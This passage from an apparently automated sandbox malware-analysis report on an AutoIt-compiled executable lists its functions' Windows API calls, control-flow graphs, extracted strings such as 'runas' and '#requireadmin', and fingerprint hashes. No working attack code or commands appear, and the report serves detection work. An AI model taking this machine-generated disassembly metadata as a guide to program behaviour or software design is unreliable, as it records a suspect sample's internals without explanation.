                                          • Part of subcall function 006F345A: GetSysColorBrush.USER32(0000000F), ref: 006F3465
                                          • Part of subcall function 006F345A: LoadCursorW.USER32(00000000,00007F00), ref: 006F3474
                                          • Part of subcall function 006F345A: LoadIconW.USER32(00000063), ref: 006F348A
                                          • Part of subcall function 006F345A: LoadIconW.USER32(000000A4), ref: 006F349C
                                          • Part of subcall function 006F345A: LoadIconW.USER32(000000A2), ref: 006F34AE
                                          • Part of subcall function 006F345A: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 006F34C6
                                          • Part of subcall function 006F345A: RegisterClassExW.USER32(?), ref: 006F3517
                                          • Part of subcall function 006F353A: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 006F3568
                                          • Part of subcall function 006F353A: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 006F3589
                                          • Part of subcall function 006F353A: ShowWindow.USER32(00000000,?,?,?,?,?,?,006F32EF,?), ref: 006F359D
                                          • Part of subcall function 006F353A: ShowWindow.USER32(00000000,?,?,?,?,?,?,006F32EF,?), ref: 006F35A6
                                          • Part of subcall function 006F38F2: Shell_NotifyIconW.SHELL32(00000000,?), ref: 006F39C3
                                        Strings
                                        • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00733C84
                                        • 0$|, xrefs: 006F341C
                                        • AutoIt, xrefs: 00733C7F
                                        • runas, xrefs: 00733D4F
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                        • String ID: 0$|$AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                        • API String ID: 683915450-569504614
                                        • Opcode ID: 531d998114c3faf5c8cf20014374bae60dca4edceaf8f025ebf00b56052c8edd
                                        • Instruction ID: 31e017f3c849340ad0969de3084bd8063cf421f00633a285d8eea6a2efc162a8
                                        • Opcode Fuzzy Hash: 531d998114c3faf5c8cf20014374bae60dca4edceaf8f025ebf00b56052c8edd
                                        • Instruction Fuzzy Hash: A551FA71148389AED715EF60DC45EBE7BA69F80740F40442CF681522A3CF6C8F4AD76A
                                        Function 00769F9F Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 409 769f9f-769fc7 FindFirstFileW 410 76a03a-76a045 FindClose 409->410 411 769fc9-769fde call 7155c2 409->411 412 76a0e2 410->412 413 76a04b-76a05e FindFirstFileW 410->413 421 769fe0-769ff5 call 7155c2 411->421 422 76a028-76a038 FindNextFileW 411->422 415 76a0e4-76a0e8 412->415 416 76a060-76a066 413->416 417 76a0d9 413->417 420 76a069-76a070 416->420 419 76a0db-76a0dc FindClose 417->419 419->412 423 76a0c7-76a0d7 FindNextFileW 420->423 424 76a072-76a087 call 7155c2 420->424 421->422 429 769ff7-76a020 GetFileAttributesW SetFileAttributesW 421->429 422->410 422->411 423->417 423->420 424->423 432 76a089-76a09e call 7155c2 424->432 430 76a026 429->430 431 76a0eb-76a0f4 FindClose 429->431 430->422 431->415 432->423 435 76a0a0-76a0be SetCurrentDirectoryW call 769f9f 432->435 438 76a0f6-76a0f8 435->438 439 76a0c0-76a0c5 SetCurrentDirectoryW 435->439 438->419 439->423
                                        APIs
                                        • FindFirstFileW.KERNELBASE(?,?,74DE8FB0,?,00000000), ref: 00769FC0
                                        • GetFileAttributesW.KERNELBASE(?), ref: 00769FFE
                                        • SetFileAttributesW.KERNELBASE(?,?), ref: 0076A018
                                        • FindNextFileW.KERNELBASE(00000000,?), ref: 0076A030
                                        • FindClose.KERNEL32(00000000), ref: 0076A03B
                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 0076A057
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0076A0A7
                                        • SetCurrentDirectoryW.KERNEL32(007B7B94), ref: 0076A0C5
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0076A0CF
                                        • FindClose.KERNEL32(00000000), ref: 0076A0DC
                                        • FindClose.KERNEL32(00000000), ref: 0076A0EC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                        • String ID: *.*
                                        • API String ID: 1409584000-438819550
                                        • Opcode ID: 867a28f7b63487b5bbdd8648254ef005f6fa0b35998c5032b9d25d2bd8999a4e
                                        • Instruction ID: f161fb8cb4b26ccac351ab051cb15df87516ff69259a8d037348b0b8002c26c3
                                        • Opcode Fuzzy Hash: 867a28f7b63487b5bbdd8648254ef005f6fa0b35998c5032b9d25d2bd8999a4e
                                        • Instruction Fuzzy Hash: 6C31A272640219BBDB24AFB4DC49ADE73ADAF45360F108155E816E20D0EB3CDE84DF65
                                        Function 0075D836 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2316 75d836-75d894 call 6fbf07 * 3 call 6f557e * 2 call 75e958 call 75e9c5 2331 75d896-75d89a call 6f65a4 2316->2331 2332 75d89f-75d8a9 call 75e9c5 2316->2332 2331->2332 2336 75d8b4-75d8f2 call 6fbf07 * 2 call 6f694e FindFirstFileW 2332->2336 2337 75d8ab-75d8af call 6f65a4 2332->2337 2345 75da23-75da2a FindClose 2336->2345 2346 75d8f8 2336->2346 2337->2336 2348 75da2d-75da5b call 6fbd2c * 5 2345->2348 2347 75d8fe-75d900 2346->2347 2347->2345 2349 75d906-75d90d 2347->2349 2351 75d913-75d979 call 6fb25f call 75df85 call 6fbd2c call 6f7af4 call 6f65a4 call 75dc8e 2349->2351 2352 75d9ef-75da02 FindNextFileW 2349->2352 2375 75d99f-75d9a3 2351->2375 2376 75d97b-75d97e 2351->2376 2352->2347 2355 75da08-75da0d 2352->2355 2355->2347 2379 75d9a5-75d9a8 2375->2379 2380 75d9d1-75d9d7 call 75da5c 2375->2380 2377 75d984-75d99b call 70e2e5 2376->2377 2378 75da12-75da21 FindClose call 6fbd2c 2376->2378 2388 75d9ad-75d9b6 MoveFileW 2377->2388 2392 75d99d DeleteFileW 2377->2392 2378->2348 2383 75d9b8-75d9c8 call 75da5c 2379->2383 2384 75d9aa 2379->2384 2390 75d9dc 2380->2390 2383->2378 2395 75d9ca-75d9cf DeleteFileW 2383->2395 2384->2388 2391 75d9df-75d9e1 2388->2391 2390->2391 2391->2378 2394 75d9e3-75d9eb call 6fbd2c 2391->2394 2392->2375 2394->2352 2395->2391
                                        APIs
                                          • Part of subcall function 006F557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006F5558,?,?,00734B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 006F559E
                                          • Part of subcall function 0075E9C5: GetFileAttributesW.KERNELBASE(?,0075D755), ref: 0075E9C6
                                        • FindFirstFileW.KERNELBASE(?,?), ref: 0075D8E2
                                        • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0075D99D
                                        • MoveFileW.KERNEL32(?,?), ref: 0075D9B0
                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 0075D9CD
                                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 0075D9F7
                                          • Part of subcall function 0075DA5C: CopyFileExW.KERNELBASE(?,?,00000000,00000000,00000000,00000008,?,?,0075D9DC,?,?), ref: 0075DA72
                                        • FindClose.KERNEL32(00000000,?,?,?), ref: 0075DA13
                                        • FindClose.KERNEL32(00000000), ref: 0075DA24
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                        • String ID: \*.*
                                        • API String ID: 1946585618-1173974218
                                        • Opcode ID: add22fb1627436e0981043a78082d18a051cc91bf909589e63c97938871945bc
                                        • Instruction ID: e89e5001e7a16bbeba886b45efe2a54a377cc83c3df1667ba152c7a07b9104e7
                                        • Opcode Fuzzy Hash: add22fb1627436e0981043a78082d18a051cc91bf909589e63c97938871945bc
                                        • Instruction Fuzzy Hash: D5617D3180114DABCF25EBA0DA529FDB7B6AF14301F248069E802B7191EB786F0DCB65
                                        Function 0075DB69 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 006F557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006F5558,?,?,00734B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 006F559E
                                          • Part of subcall function 0075E9C5: GetFileAttributesW.KERNELBASE(?,0075D755), ref: 0075E9C6
                                        • FindFirstFileW.KERNELBASE(?,?), ref: 0075DBE0
                                        • DeleteFileW.KERNELBASE(?,?,?,?), ref: 0075DC30
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0075DC41
                                        • FindClose.KERNEL32(00000000), ref: 0075DC58
                                        • FindClose.KERNEL32(00000000), ref: 0075DC61
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                        • String ID: \*.*
                                        • API String ID: 2649000838-1173974218
                                        • Opcode ID: dc6fd126b503703d326c67a62e90f7aade10a1c58be30040b8c15e932371090b
                                        • Instruction ID: 7f9f212badf4603f8d1ff24617c9208a39033c22dae98800e27cb1afa1423e95
                                        • Opcode Fuzzy Hash: dc6fd126b503703d326c67a62e90f7aade10a1c58be30040b8c15e932371090b
                                        • Instruction Fuzzy Hash: 8E315C310083899BC360EB64D8918EFB7E9BE91301F44591DF9D1921A1EBA4DE0DCB6A
                                        Function 0075DC9C Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 0075DCC1
                                        • Process32FirstW.KERNEL32(00000000,?), ref: 0075DCCF
                                        • Process32NextW.KERNEL32(00000000,?), ref: 0075DCEF
                                        • CloseHandle.KERNELBASE(00000000), ref: 0075DD9C
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 420147892-0
                                        • Opcode ID: 354fe8937311f0b141cdc5402c6508d80fac449680163ebfee3fe3716db067d1
                                        • Instruction ID: 4cf528c4fa7b83b8b47ed2f00c1209963396774a6849ff86e5a553a7e8f39854
                                        • Opcode Fuzzy Hash: 354fe8937311f0b141cdc5402c6508d80fac449680163ebfee3fe3716db067d1
                                        • Instruction Fuzzy Hash: D63170711083049FD321EF64D885ABFBBF9AF98350F14092DF681861A1DBB59948CB92
                                        Function 0075E387 Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrlenW.KERNEL32(?,00734686), ref: 0075E397
                                        • GetFileAttributesW.KERNELBASE(?), ref: 0075E3A6
                                        • FindFirstFileW.KERNELBASE(?,?), ref: 0075E3B7
                                        • FindClose.KERNEL32(00000000), ref: 0075E3C3
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: FileFind$AttributesCloseFirstlstrlen
                                        • String ID:
                                        • API String ID: 2695905019-0
                                        • Opcode ID: 54216e6ce806cccb1100a1d45806c82f450adf8ad1b374195488a46c43d41075
                                        • Instruction ID: 0f2a47c07bb34d8cf373024163b2519e92b95152c3c98611c52538f2640fc8ee
                                        • Opcode Fuzzy Hash: 54216e6ce806cccb1100a1d45806c82f450adf8ad1b374195488a46c43d41075
                                        • Instruction Fuzzy Hash: 18F0A03041192057C2256738AD0D8AA77ACAE41336B208711F835C20F0D7B89E994699
                                        Function 00715078 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcess.KERNEL32(?,?,0071504E,?,007B98D8,0000000C,007151A5,?,00000002,00000000), ref: 00715099
                                        • TerminateProcess.KERNEL32(00000000,?,0071504E,?,007B98D8,0000000C,007151A5,?,00000002,00000000), ref: 007150A0
                                        • ExitProcess.KERNEL32 ref: 007150B2
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Process$CurrentExitTerminate
                                        • String ID:
                                        • API String ID: 1703294689-0
                                        • Opcode ID: f7ab0de0060a7b40a90e3b435b3f63b06e33bd273cbc3542b3b6522279fcb5b7
                                        • Instruction ID: 237c83f2afdc8835deb04776810c837f7ce80c5bfefe018498ff1613a0bb0926
                                        • Opcode Fuzzy Hash: f7ab0de0060a7b40a90e3b435b3f63b06e33bd273cbc3542b3b6522279fcb5b7
                                        • Instruction Fuzzy Hash: DEE0B631450548EFCF256FA8DD0DE983B6AEF89781F118014F8158A5A2DB3DEE82DB94
                                        Function 0074E5F8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetUserNameW.ADVAPI32(?,?), ref: 0074E60A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: NameUser
                                        • String ID: X64
                                        • API String ID: 2645101109-893830106
                                        • Opcode ID: 46f854ccdb123a5ae9b357bdf5e9a333db651cce5ae2a0dac7b96986f8f1ca57
                                        • Instruction ID: 4465439f3409eba6534c0bf35e674f9ab93dcaf3735dfda2dbc47b102c4705fb
                                        • Opcode Fuzzy Hash: 46f854ccdb123a5ae9b357bdf5e9a333db651cce5ae2a0dac7b96986f8f1ca57
                                        • Instruction Fuzzy Hash: 60D0C9B580111DEACBA0CB90DC88DDD73BCBB04304F104552F506A2040D73895488B10
                                        Function 0077CD16 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 77cd16-77cd5a call 6fbf07 * 3 7 77cd65-77cdd8 call 6f8e70 call 77d6b1 call 77d2f7 0->7 8 77cd5c-77cd5f 0->8 22 77cdda-77cde8 7->22 23 77ce08-77ce0d 7->23 8->7 9 77ce64-77ce71 call 6fe650 8->9 15 77d1ef-77d212 call 6fbd2c * 3 9->15 24 77cded-77cdfd 22->24 25 77cdea 22->25 27 77ce0f-77ce24 RegConnectRegistryW 23->27 28 77ce7c 23->28 29 77ce02-77ce06 24->29 30 77cdff 24->30 25->24 33 77ce76-77ce7a 27->33 34 77ce26-77ce43 call 6f7ab0 27->34 31 77ce80-77ceab RegCreateKeyExW 28->31 35 77ce61-77ce63 29->35 30->29 36 77cf0e-77cf13 31->36 37 77cead-77ceca call 6f7ab0 31->37 33->31 46 77ce45 34->46 47 77ce48-77ce58 34->47 35->9 42 77d1d6-77d1e7 RegCloseKey 36->42 43 77cf19-77cf42 call 6f8e70 call 714db8 36->43 50 77cecf-77cede 37->50 51 77cecc 37->51 42->15 48 77d1e9-77d1ed RegCloseKey 42->48 59 77cf96-77cfb9 call 6f8e70 call 714db8 43->59 60 77cf44-77cf91 call 6f8e70 call 714cf3 call 6f8e70 * 2 43->60 46->47 52 77ce5d 47->52 53 77ce5a 47->53 48->15 55 77cee3-77cef9 call 6fe650 50->55 56 77cee0 50->56 51->50 52->35 53->52 55->15 63 77ceff-77cf09 RegCloseKey 55->63 56->55 71 77d047-77d06a call 6f8e70 call 714db8 59->71 72 77cfbf-77d019 call 6f8e70 call 714cf3 call 6f8e70 * 2 RegSetValueExW 59->72 85 77d2bb-77d2c7 RegSetValueExW 60->85 63->15 86 77d156-77d179 call 6f8e70 call 714db8 71->86 87 77d070-77d0d6 call 6f8e70 call 71019b call 6f8e70 call 6f605e 71->87 72->42 105 77d01f-77d042 call 6f7ab0 call 6fe650 72->105 85->42 89 77d2cd-77d2f2 call 6f7ab0 call 6fe650 85->89 106 77d215-77d238 call 6f8e70 call 714db8 86->106 107 77d17f-77d19f call 6fc92d call 6f8e70 86->107 124 77d0f6-77d128 call 6f8e70 RegSetValueExW 87->124 125 77d0d8-77d0dd 87->125 89->42 105->42 128 77d265-77d282 call 6f8e70 call 714db8 106->128 129 77d23a-77d260 call 6fc5df call 6f8e70 106->129 127 77d1a1-77d1b4 RegSetValueExW 107->127 139 77d14a-77d151 call 7101a4 124->139 140 77d12a-77d143 call 6f7ab0 call 6fe650 124->140 130 77d0e5-77d0e8 125->130 131 77d0df-77d0e1 125->131 127->42 135 77d1b6-77d1c0 call 6f7ab0 127->135 145 77d1c5-77d1cf call 6fe650 128->145 153 77d288-77d2b9 call 76276a call 6f8e70 call 7627da 128->153 129->127 130->125 132 77d0ea-77d0ec 130->132 131->130 132->124 137 77d0ee-77d0f2 132->137 135->145 137->124 139->42 140->139 145->42 153->85
                                        APIs
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0077CE1C
                                        • RegCreateKeyExW.KERNELBASE(?,?,00000000,0078DCD0,00000000,?,00000000,?,?), ref: 0077CEA3
                                        • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0077CF03
                                        • _wcslen.LIBCMT ref: 0077CF53
                                        • _wcslen.LIBCMT ref: 0077CFCE
                                        • RegSetValueExW.KERNELBASE(00000001,?,00000000,00000001,?,?), ref: 0077D011
                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0077D120
                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0077D1AC
                                        • RegCloseKey.KERNELBASE(?), ref: 0077D1E0
                                        • RegCloseKey.ADVAPI32(00000000), ref: 0077D1ED
                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0077D2BF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                        • API String ID: 9721498-966354055
                                        • Opcode ID: 49fdf800aa155fe8e74fb5ed85b7feabd31dae76eeb793c1d88b68f6a17d617a
                                        • Instruction ID: 8b844818325acfaa9971f656692734d7c8eb1f659619def27dff23e947824004
                                        • Opcode Fuzzy Hash: 49fdf800aa155fe8e74fb5ed85b7feabd31dae76eeb793c1d88b68f6a17d617a
                                        • Instruction Fuzzy Hash: D91268352042049FDB24DF18C885A2AB7F6FF88754F15849CF99A9B3A2CB35ED41CB85
                                        Function 006F3E15 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 163 6f3e15-6f3e45 call 71019b call 71016b 168 6f3e6e-6f3e80 call 71919b 163->168 169 6f3e47-6f3e49 163->169 171 6f3e4a-6f3e50 168->171 175 6f3e82-6f3e94 call 71919b 168->175 169->171 173 6f3e65-6f3e6b 171->173 174 6f3e52-6f3e62 call 71015d call 7101a4 171->174 174->173 182 6f3e9a-6f3eac call 71919b 175->182 183 734585-734587 175->183 186 6f3eb2-6f3ec4 call 71919b 182->186 187 73458c-73458f 182->187 183->171 190 6f3eca-6f3edc call 71919b 186->190 191 734594-7345cb call 6f4154 call 6f4093 call 6f3fb8 call 714cf3 186->191 187->171 196 73462e-734633 190->196 197 6f3ee2-6f3ef4 call 71919b 190->197 223 734608-73460b 191->223 224 7345cd-7345d8 191->224 196->171 201 734639-734655 call 70e2e5 196->201 206 734677-734688 call 75a316 197->206 207 6f3efa-6f3f0c call 71919b 197->207 209 734662-73466a 201->209 210 734657-73465b 201->210 219 73468a-7346d2 call 6fb25f * 2 call 6f5379 call 6f3aa3 call 6fbd2c * 2 206->219 220 7346dc-7346e2 206->220 221 6f3f0e-6f3f20 call 71919b 207->221 222 6f3f26 207->222 209->171 215 734670 209->215 210->201 214 73465d 210->214 214->171 215->206 241 734704-734706 219->241 268 7346d4-7346d7 219->268 225 7346f5-7346ff call 75a12a 220->225 221->171 221->222 230 6f3f29-6f3f2e call 6fad74 222->230 226 7345f6-734603 call 7101a4 223->226 227 73460d-73461b 223->227 224->223 231 7345da-7345e1 224->231 225->241 226->225 240 734620-734629 call 7101a4 227->240 243 6f3f33-6f3f35 230->243 231->226 232 7345e3-7345e7 231->232 232->226 238 7345e9-7345f4 232->238 238->240 240->171 241->171 244 6f3f3b-6f3f5e call 6f3fb8 call 6f4093 call 71919b 243->244 245 7346e4-7346e9 243->245 264 6f3fb0-6f3fb3 244->264 265 6f3f60-6f3f72 call 71919b 244->265 245->171 250 7346ef-7346f0 245->250 250->225 264->230 265->264 270 6f3f74-6f3f86 call 71919b 265->270 268->171 273 6f3f9c-6f3fa5 270->273 274 6f3f88-6f3f9a call 71919b 270->274 273->171 275 6f3fab 273->275 274->230 274->273 275->230
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                        • API String ID: 0-1645009161
                                        • Opcode ID: 8a5d9b8827a575dcfcb9415ae1f960524eb31f773e1cf81b96b2e1873f353de1
                                        • Instruction ID: becf413480a55f19c6f7ebb267d40968de408b1efc063348516eee5b85ccc937
                                        • Opcode Fuzzy Hash: 8a5d9b8827a575dcfcb9415ae1f960524eb31f773e1cf81b96b2e1873f353de1
                                        • Instruction Fuzzy Hash: C2811671A40219FBDB14AF64CC46FFE37A6BF05700F004015FA056A2C6EB78EA91D795
                                        Function 006F3696 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 145windowtimeregistryCOMMON
